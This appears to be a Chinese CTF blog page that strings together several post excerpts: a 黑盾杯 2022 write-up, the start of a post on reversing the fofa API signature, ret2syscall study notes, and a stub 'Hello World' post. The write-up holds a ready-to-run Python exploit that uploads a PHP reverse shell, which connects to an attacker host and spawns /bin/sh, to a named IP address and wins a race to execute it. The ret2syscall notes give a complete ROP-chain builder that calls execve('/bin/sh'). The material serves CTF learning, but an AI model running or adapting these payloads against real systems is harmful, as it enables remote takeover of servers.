黑盾杯 2022 Online Writeup

Do you secure

dirsearch turns up upload.php

Race condition: the uploaded file lands under /upload/ and is only reachable briefly, so the exploit uploads a PHP reverse shell and requests the returned path immediately.

import requests

# PHP reverse shell: connects back to the listener and wires /bin/sh's stdin/stdout/stderr to the socket.
# "xxx" is the attacker's host; start a listener on port 9999 first (e.g. nc -lvnp 9999).
files = {'pic': ('ma.php', '''
<?php
$sock = fsockopen("xxx", "9999");
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
''', 'image/png')}   # content type claimed as image/png

# Upload, then request the echoed /upload/ path right away to win the race.
r = requests.post("http://39.104.68.128:24430/upload.php", files=files)
print(r.text)
res = r.text[r.text.find("/upload/"):r.text.find("<br>")]   # path echoed back by upload.php
print(res)
r = requests.get("http://39.104.68.128:24430" + res)
print(r.text)

Reversing the fofa API signature

One day, when I went to use a script I had written from captured traffic to crawl some data from fofa, it failed:

{
"code": -9,
"message": "[-9] API校验密匙错",
"data": ""
}

(The message "API校验密匙错" means "API verification key is wrong".) Capturing the traffic again showed that the request now carries three extra parameters, ts, sign and app_id; the key one is sign.



syscall & ret2syscall study notes

Check the protections with checksec:

checksec rop
[*] 'rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

Load it into IDA and look at the decompiled source:

int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[100]; // [esp+1Ch] [ebp-64h] BYREF

setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
puts("No system for you this time !!!");
gets(s);                   // unbounded read into a 100-byte stack buffer: stack overflow
strncpy(buf2, s, 0x64u);   // buf2 is a global; only the first 0x64 bytes are copied
printf("bye bye ~");
return 0;
}
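NX is on, so no shellcode on the stack, and there is no canary, so `gets(s)` gives full control of the return address. The ret2syscall route is a ROP chain that sets up `execve("/bin/sh", NULL, NULL)` and triggers `int 0x80`: on i386 the kernel reads the syscall number from eax (0xb for execve), the path from ebx, argv from ecx and envp from edx. Below is an added example, not the blog's exploit: it scans a byte blob for the needed gadgets, resolves their addresses against the 0x8048000 load base reported by checksec, and packs the chain. The `.text` bytes are constructed so the example runs offline; for the real binary, feed in its actual segment bytes (or use ROPgadget) and measure the padding with a cyclic pattern. The offset used here, 0x64 + 4, is an assumption derived from `s` sitting at `[ebp-0x64]` plus the saved ebp under a plain frame layout; a `main` that restores esp through ecx changes it, so verify it.

```python
"""ret2syscall on i386: execve("/bin/sh", NULL, NULL) through int 0x80 (added example)."""
import re
import struct

LOAD_BASE = 0x08048000   # from checksec: No PIE (0x8048000)
SYS_EXECVE = 0x0B        # i386 syscall number for execve

# i386 encodings of the gadgets the chain needs.
GADGETS = {
    "pop_eax_ret": b"\x58\xc3",                  # pop eax ; ret
    "pop_edx_ecx_ebx_ret": b"\x5a\x59\x5b\xc3",  # pop edx ; pop ecx ; pop ebx ; ret
    "int80": b"\xcd\x80",                        # int 0x80
}

# Constructed stand-in for the binary's .text segment (NOP sleds around the gadgets).
FAKE_TEXT = (b"\x90" * 0x10 + GADGETS["pop_eax_ret"]
             + b"\x90" * 0x20 + GADGETS["pop_edx_ecx_ebx_ret"]
             + b"\x90" * 0x30 + GADGETS["int80"]
             + b"\x90" * 0x05 + b"/bin/sh\x00")

# Assumed padding: s at [ebp-0x64] plus the 4-byte saved ebp. Verify with a cyclic pattern.
OFFSET = 0x64 + 4


def p32(v):
    """Pack a 32-bit little-endian value (what pwntools' p32 does)."""
    return struct.pack("<I", v)


def find_gadgets(text, base=LOAD_BASE):
    """Map gadget name -> absolute address of its first occurrence in `text`."""
    addrs = {}
    for name, code in GADGETS.items():
        m = re.search(re.escape(code), text)
        if m is None:
            raise LookupError(f"gadget {name} not present")
        addrs[name] = base + m.start()
    return addrs


def find_binsh(text, base=LOAD_BASE):
    """Absolute address of a NUL-terminated "/bin/sh" inside `text`."""
    idx = text.find(b"/bin/sh\x00")
    if idx < 0:
        raise LookupError("/bin/sh string not present")
    return base + idx


def build_chain(offset, gadgets, binsh):
    """padding | pop eax;ret | 0xb | pop edx;ecx;ebx;ret | 0 | 0 | &"/bin/sh" | int 0x80"""
    chain = b"A" * offset
    chain += p32(gadgets["pop_eax_ret"]) + p32(SYS_EXECVE)          # eax = SYS_execve
    chain += p32(gadgets["pop_edx_ecx_ebx_ret"])                     # edx = envp, ecx = argv, ebx = path
    chain += p32(0) + p32(0) + p32(binsh)
    chain += p32(gadgets["int80"])                                   # trap into the kernel
    if b"\n" in chain:
        # gets() stops reading at '\n'; an address containing 0x0a needs another gadget
        raise ValueError("chain contains a newline byte")
    return chain


if __name__ == "__main__":
    g = find_gadgets(FAKE_TEXT)
    payload = build_chain(OFFSET, g, find_binsh(FAKE_TEXT))
    print(payload.hex())
```

The newline check matters because the overflow goes through `gets`, which terminates at 0x0a; the `strncpy` into `buf2` afterwards only copies the first 0x64 bytes and does not affect the chain already on the stack.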

Hello World

Nya~